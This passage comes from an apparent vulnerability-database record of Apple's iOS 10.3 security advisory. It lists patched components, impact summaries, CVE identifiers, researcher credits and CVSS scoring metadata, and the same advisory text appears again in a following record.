This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and 
later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory 
management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of iOS 10.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", 
"CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029", "CVE-2017-6976"], "modified": "2017-03-27T00:00:00", "id": "APPLE:218B65DBD8E421B171C5CC7639BE893D", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:31", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. 
This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: 
iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian 
Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. 
This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. 
This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. 
This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content 